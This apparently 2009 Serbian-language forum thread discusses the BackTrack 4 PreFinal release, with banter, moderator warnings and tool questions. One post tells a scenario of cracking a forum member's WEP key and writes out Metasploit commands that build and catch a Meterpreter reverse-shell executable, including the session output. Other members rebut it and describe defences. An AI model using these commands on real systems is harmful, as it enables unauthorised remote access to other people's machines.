Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

BackTrack 4 PreFinal - public release!!!

[es] :: Linux :: BackTrack 4 PreFinal - public release!!!

Strane: 1 2 3 4 5

[ Pregleda: 29181 | Odgovora: 83 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

jorganwd
Muris Kurgaš
/dev/null

Član broj: 65537
Poruke: 779

Sajt: www.remote-exploit.org


+34 Profil

icon BackTrack 4 PreFinal - public release!!!20.06.2009. u 19:48 - pre 180 meseci
Remote Exploit tim je objavio javno BackTrack 4 PreFinal verziju. Vise o tome na http://www.offensive-security....l-public-release-and-download/

Uzivajte! :)

remote-exploit.org team
 
Odgovor na temu

x.starlight

Član broj: 225316
Poruke: 8
*.kbcnet.co.yu.



Profil

icon Re: BackTrack 4 PreFinal - public release!!!21.06.2009. u 14:35 - pre 180 meseci
...skida se
...nego ljudi shta vi radite sa ovim bt? ...igra li se neko?

...random starlight meets a blind eye
seeking undiscovered self-importance ...
pleasant distance finds me still
slighly awaiting what is getting closer...
 
Odgovor na temu

Srđan Pavlović
Specijalna Edukacija i Rehabilitacija MNRO
Vojvodina, Bačka Palanka

Član broj: 139340
Poruke: 5571
*.static.isp.telekom.rs.

Sajt: www.oligofrenolog.com


+382 Profil

icon Re: BackTrack 4 PreFinal - public release!!!21.06.2009. u 15:29 - pre 180 meseci
Pa kad downloadujes i narezes BT na disk ili stavis na USB, postajes automatski haker... ;)
 
Odgovor na temu

Sudomaster
Student
Beograd

Član broj: 214484
Poruke: 82
*.dynamic.sbb.rs.



Profil

icon Re: BackTrack 4 PreFinal - public release!!!21.06.2009. u 15:35 - pre 180 meseci
^^ i onda možeš da 'akuješ sam sebe
SUDO is your best friend, whit him... u can do anything!
 
Odgovor na temu

Mister_rap
SE at Viacom

Član broj: 8822
Poruke: 2540
*.dynamic.sbb.rs.

Jabber: mister_rap@jabber.com


+21 Profil

icon Re: BackTrack 4 PreFinal - public release!!!21.06.2009. u 16:12 - pre 180 meseci
I sto bi rek'o Rambo mozes da uhakujes u windowz 32 bitni sistem
 
Odgovor na temu

x.starlight

Član broj: 225316
Poruke: 8
*.kbcnet.co.yu.



Profil

icon Re: BackTrack 4 PreFinal - public release!!!21.06.2009. u 17:03 - pre 180 meseci
...nego momci mnogo se vi zezate ovde
ipak su ovo ozbiljne teme ...sad kao smajliji belji tu ...e

...ima li nekog ko se shetkao po gradu sa bt.om ...igao se u promiskuitetnom modu sa komshilukom ?

...malo da nam ispricha iskustva

p.s nisam chitao pravila foruma, pa eto i ' pseudo ' situacije su dobrodoshle
...random starlight meets a blind eye
seeking undiscovered self-importance ...
pleasant distance finds me still
slighly awaiting what is getting closer...
 
Odgovor na temu

combuster
Ivan Bulatovic
Kraljevo

Član broj: 151351
Poruke: 4563
93.86.111.*

Sajt: www.linuxsrbija.org


+104 Profil

icon Re: BackTrack 4 PreFinal - public release!!!21.06.2009. u 17:28 - pre 180 meseci
http://www.elitesecurity.org/o/pravilnik/korisnici/
make love - !war
 
Odgovor na temu

Srđan Pavlović
Specijalna Edukacija i Rehabilitacija MNRO
Vojvodina, Bačka Palanka

Član broj: 139340
Poruke: 5571
*.static.isp.telekom.rs.

Sajt: www.oligofrenolog.com


+382 Profil

icon Re: BackTrack 4 PreFinal - public release!!!21.06.2009. u 17:39 - pre 180 meseci
Ok, da ne bi doslo do lockovanja teme, koja u principu ne mora biti lockovana,
odmah da napomenem da ce price o "hakovanju komsijinog wireless-a" i slicno
biti dalje brisane (tj, postovi).

Izasla je nova verzija BT-a, i diskusija se moze voditi o tome sta je sve ukljuceno
u novi BT, koje su verzije programa, sa kojim novim opcijama, sta je ispravljeno od propusta, itd.

Pozdrav.
 
Odgovor na temu

x.starlight

Član broj: 225316
Poruke: 8
*.kbcnet.co.yu.



Profil

icon Re: BackTrack 4 PreFinal - public release!!!21.06.2009. u 18:47 - pre 180 meseci
...u pravilniku ne pishe nishta shto bi zabranjivalo tekstove o iskustvima prilikom penetration test.a mreze ...da se ne bi igrali machke i misha i da uz svaku rechenicu ubacujem .legalno uz dozvolu vlasnika itd.

...hm mislim da sam negde video kako sliche teme gube smisao .mislim, bash zbog dosadnih razgovora bez praktichnih primera

...razmena iskustva, interakcija ...mislim da je to pravi nachin da se uchi ...oni koji imaju znanja u nekoj oblasti delili bi sa drugima ...ozbiljnije teme bi se priblizile ljudima koji zele da uche i lakshe bi savladjivali prepreke i logika razmishljanja na datu temu bi se okrenula u pravom smeru

...lepo je to shto je izashao bt4 ...ali shta sa time? ...samo pozeleh malo da chachnem i razmrdam ovu temu
...nja
...random starlight meets a blind eye
seeking undiscovered self-importance ...
pleasant distance finds me still
slighly awaiting what is getting closer...
 
Odgovor na temu

loonies
~

Član broj: 40927
Poruke: 248



+12 Profil

icon Re: BackTrack 4 PreFinal - public release!!!21.06.2009. u 23:26 - pre 180 meseci
Citat:
x.starlight: ...lepo je to shto je izashao bt4 ...ali shta sa time? ...samo pozeleh malo da chachnem i razmrdam ovu temu


Kolega sa Vise je ispitivao ranjivosti WiFi mreza po BG-u pomocu BT-a, cak mislim da je iz predmeta SRM bio seminarski na tu temu koliko se secam da je Pleska nesto tako spomenuo.

Zgodan skup alata objedinjenih na jednom mestu.
And all you touch and all you see
Is all your life will ever be
---Δ==

Neugodna istina - reaguj! | Linux is not Windows
 
Odgovor na temu

flighter_022
L2 Applications Administrator
NS

Član broj: 18499
Poruke: 737
*.directonpc.net.

ICQ: 23089150


+232 Profil

icon Re: BackTrack 4 PreFinal - public release!!!21.06.2009. u 23:35 - pre 180 meseci
Najteze je hakovati 127.0.0.1 ;)
 
Odgovor na temu

x.starlight

Član broj: 225316
Poruke: 8
*.kbcnet.co.yu.



Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 00:22 - pre 180 meseci
Citat:
loonies: Kolega sa Vise je ispitivao ranjivosti WiFi mreza po BG-u pomocu BT-a, cak mislim da je iz predmeta SRM bio seminarski na tu temu koliko se secam da je Pleska nesto tako spomenuo.



...eto neshto zanimljivo
...treba potraziti taj rad
Citat:
loonies: Zgodan skup alata objedinjenih na jednom mestu.


...nekako je uvek tu :) ...pojavljuje se u velikom broju knjiga i tutorijala ...video tutorijala ...gde su praktichni primeri tu je uvek ...dobro je kad mozesh da se oslonish na distribuciju ...alate
...a i prelaz na 'ubuntu bazu' je logichan potez ...uchinice ga fleksibilnijim

...random starlight meets a blind eye
seeking undiscovered self-importance ...
pleasant distance finds me still
slighly awaiting what is getting closer...
 
Odgovor na temu

Misterio

Član broj: 439
Poruke: 54
195.178.47.*



Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 06:57 - pre 180 meseci
^ Sta ti znace ove tackice na pocetku svake recenice? Jel se to menjao pravopis ili sta?
 
Odgovor na temu

Tyler Durden
Tyler Durden
Beograd

Član broj: 4312
Poruke: 3379
*.verat.net.



+1365 Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 09:11 - pre 180 meseci
Jel ima u tom BT alata za skeniranje/provjeru web stranica na XSS, SQL injection i slične stvari?
Imam problema sa jednim sajtom PHP/MySQL i izgleda da postoji neki propust u samom kodu.
Beneath civilization's fragile crust, cold chaos churns...
 
Odgovor na temu

combuster
Ivan Bulatovic
Kraljevo

Član broj: 151351
Poruke: 4563
93.86.6.*

Sajt: www.linuxsrbija.org


+104 Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 09:25 - pre 180 meseci
Citat:

...eto neshto zanimljivo
...treba potraziti taj rad


Da, bas me zanima brojka HG520 rutera koji imaju enabled wireless a koji nisu zasticeni niti preko wpa niti preko wep-a niti preko mac access-a... Kome treba bt za to ;-)
make love - !war
 
Odgovor na temu

anon68680

Član broj: 68680
Poruke: 528
77.46.169.*



+14 Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 11:20 - pre 180 meseci
Citat:
Tyler Durden: Jel ima u tom BT alata za skeniranje/provjeru web stranica na XSS, SQL injection i slične stvari?
Imam problema sa jednim sajtom PHP/MySQL i izgleda da postoji neki propust u samom kodu.


Iako ga nisam u potpunosti istrazio, bt je penetration testing OS, tako da bi reko da postoji support za to. Mada bi ti preporucio da olaksas sebi zivot i lepo uradis to sa Acunetix-om ili slicnim win-based alatom...
 
Odgovor na temu

x.starlight

Član broj: 225316
Poruke: 8
*.kbcnet.co.yu.



Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 14:09 - pre 180 meseci
Citat:
combuster: Da, bas me zanima brojka HG520 rutera koji imaju enabled wireless a koji nisu zasticeni niti preko wpa niti preko wep-a niti preko mac access-a... Kome treba bt za to ;-)


...evo situacije > park ispred tvoje gajbe combuster ...i tvoja wireless mreza se uklapa u tih 3%:) zashticenih mreza wep.om ili ti (wired equivalent privacy)
...da naravno imash jedan laptop i u coopatilu pored djakuzija kao i u sobi, a i tvoja mladja seka voli da iz kreveta do jutra sa viruelnim drugarima sa space.a kucka (kazu da deca sada prvo prokuckaju) na svom roze laptopu
...i tako dok ti uzivash u ispijanju vina u djakuziju i pregledanja rezultata na livescore i ne slutish da je bt u blizini:) ...tvoj wep key je razbijen (mislim da ima tone tutorijala na youtube.u kako)
...e sada imash josh jednog drugara na mrezi ...ups toliko shareovanih foldera
...ima tu svashta ...ali ipak su ozbiljnije stvari na desktopu :) ...ne bi dozvolio bash seka da chachka po svemu ...ali muzika i filmovi su tu ...par nekih programa ...na tvojoj mashini ...kod nje neke slike sa letovanja ...hm
...skenirani portovi ...nishta zanimljivo otvoreno ...sp2 je na obe upaljene mashine
...ok imam dovoljno vremena ...kafic prekoputa je skroz opushten ...cica shto radi je totalno zanimljiva ...bt user naruchuje kafu i pita za ime? ...marija

cd /pentest/exploits/framework3/

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.88
LPORT=4444 R | ./msfencode -b '' -t exe -o marijaizkaficaprekoputa.exe /* ah kako ce ti ovo zagollicati mashtu

...ovaj zanimljiv payload ce zavrshiti na jednom od tvojih shareovanih foldera a tvojoj sestri cemo prirediti malo drugachiji scenario

e sada kamp prikolica i

./msfconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.1.88
msf > set LPORT 4444
msf > exploit

...da naravno da je mogao da ode kuci i da sachekushu preusmeri ...ali ima dovoljno vremena ...marija samo jedno pitanje "da li bi volela da te neko doubleklikne" ?

msf exploit(handler) > exploit
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.1.88:4444 -> 192.168.1.4:1187)

meterpreter >

...the end

[Ovu poruku je menjao Kernel-1 dana 22.06.2009. u 16:51 GMT+1]
...random starlight meets a blind eye
seeking undiscovered self-importance ...
pleasant distance finds me still
slighly awaiting what is getting closer...
 
Odgovor na temu

jorganwd
Muris Kurgaš
/dev/null

Član broj: 65537
Poruke: 779

Sajt: www.remote-exploit.org


+34 Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 14:33 - pre 180 meseci
Citat:
Tyler Durden: Jel ima u tom BT alata za skeniranje/provjeru web stranica na XSS, SQL injection i slične stvari?
Imam problema sa jednim sajtom PHP/MySQL i izgleda da postoji neki propust u samom kodu.


Ima posebna sekcija za web app testing. ne bas potpuna lista alata se moze vidjeti na wiki.remote-exploit.org, i dalje se dopunjuje.

Ukoliko neko smatra da neki alat zasluzuje mjesto u backtrack-u, neka napise ovdje s obzirom da izmedju ostalog i dio repozitorijuma uredjujem.
 
Odgovor na temu

combuster
Ivan Bulatovic
Kraljevo

Član broj: 151351
Poruke: 4563
93.86.111.*

Sajt: www.linuxsrbija.org


+104 Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 14:35 - pre 180 meseci
Ti si bre neki pacenik covece, al da ti objasnim par stvari...

Prvo to sto si napisao sad pali na totalnim idiotima kojih ne sumnjam ima dosta...

Da bi razbio moj wireless moras prvo da dodjes da mi pokucas na vrata sa shotgun-om u ruci i pod pretpostavkom da ti nece zavrsiti tamo gde sunce ne sija treba da nadjes moj wireless ruter, da pritisnes dugmence sa hemijskom olovkom i da pobegnes... Koliko te noge nose...

Al ajd recimo da ne koristim MAC restricted access nego WEP ili WPA i pod uslovom da bypass-ujes nekako pass ili key i da postavis marijaprekoputakafica.exe (pa i da ga sakrijes za pametne kao marija.jpg.exe i preko slicnih lame fazona) kod mene bi morao da ga pokrenem preko wine-a... Drugo treba taj tvoj exploit da zaobidje tomoyo koji ce da primeti unusual process behaviour a i ako njega zaobidje treba da mi probije firewall kroz iptables i da ti uspostavi konekciju...

ja bih rekao da bi pri ovom scenario the end tebi dosao vrlo brzo...

I molim te ne spominji bez razloga familiju drugim es userima, nije pristojno... Ovo ti pisem bez truncice flame-a jer sam se takvih kao ti navidjao u zivotu svome... A bese prodje decenija cela od kada sam sekirao nazovi hakere preko irc-a koji su isti kao i danas (samo su sa sub7 presli na bt) jer zaboga kako sme exploit koji je radio na 99% masina u to vreme da fail-uje na mojoj a sve sto sam ucio o virusima i exploitima je bilo upravo zbog ucenja kako da zastitim masine od istih, jer znas, to se za razliku od 'akovanja wifi-a u parku placa... A vidjao sam sve pa cak i "weird seagate" i "quantum nighthawk" i gomile ostalih zezancija...

/edit: obrisan odgovor na flame.

[Ovu poruku je menjao Kernel-1 dana 22.06.2009. u 16:53 GMT+1]
make love - !war
 
Odgovor na temu

Tyler Durden
Tyler Durden
Beograd

Član broj: 4312
Poruke: 3379
*.verat.net.



+1365 Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 15:01 - pre 180 meseci
E momci, skulirajte se malo. Ovo su opustene diskusije i tu smo da razmjenimo znanje, a ne da se svadjamo i foliramo.
Beneath civilization's fragile crust, cold chaos churns...
 
Odgovor na temu

[es] :: Linux :: BackTrack 4 PreFinal - public release!!!

Strane: 1 2 3 4 5

[ Pregleda: 29181 | Odgovora: 83 ] > FB > Twit

Postavi temu Odgovori

Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.